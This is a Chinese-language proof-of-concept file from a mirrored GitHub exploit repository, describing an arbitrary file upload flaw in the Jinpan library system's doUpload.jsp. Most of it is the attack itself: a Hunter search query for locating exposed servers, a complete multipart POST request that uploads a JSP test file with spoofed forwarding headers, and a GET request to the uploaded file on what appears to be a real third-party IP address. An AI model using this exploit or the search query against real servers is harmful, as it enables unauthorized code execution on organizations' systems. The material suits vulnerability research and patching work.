admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金盘/金盘图书馆系统/金盘图书馆系统doUpload存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

65 lines
2.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 金盘图书馆系统doUpload存在任意文件上传漏洞
# 一、漏洞简介
金盘图书馆系统doUpload存在任意文件上传漏洞攻击者可通过该漏洞获取服务器权限。
# 二、影响版本
+ 金盘图书馆系统
# 三、资产测绘
+ hunter`web.body="/opac/opacRssCollect"`
+ 特征
![1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47.png](./img/J_6NyNKSVhklsxlG/1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47-740576.png)
# 四、漏洞复现
```plain
POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 235
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----xbkdgks1fwucvok84tce
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
------xbkdgks1fwucvok84tce
Content-Disposition: form-data; name="file";filename="tvrodinjqx.jsp"
<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------xbkdgks1fwucvok84tce--
```
![1706076044489-305f3cf0-e373-47b5-b0f9-c72f0570d05f.png](./img/J_6NyNKSVhklsxlG/1706076044489-305f3cf0-e373-47b5-b0f9-c72f0570d05f-592253.png)
上传文件位置
```plain
GET /upload/2024-01-24/1706077745930.jsp HTTP/1.1
Host: 42.247.6.28:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
```
![1706077840008-2a84e501-4e3c-4484-8b55-93a74b9f3b96.png](./img/J_6NyNKSVhklsxlG/1706077840008-2a84e501-4e3c-4484-8b55-93a74b9f3b96-027567.png)
[金盘图书馆系统-doupload-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222151277-db0f2eb8-6fd5-4fbe-957a-bab7b52f6727.yaml)
> 更新: 2024-02-29 23:55:51
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/om1k8iewd86fg4op>
Reference in New Issue View Git Blame Copy Permalink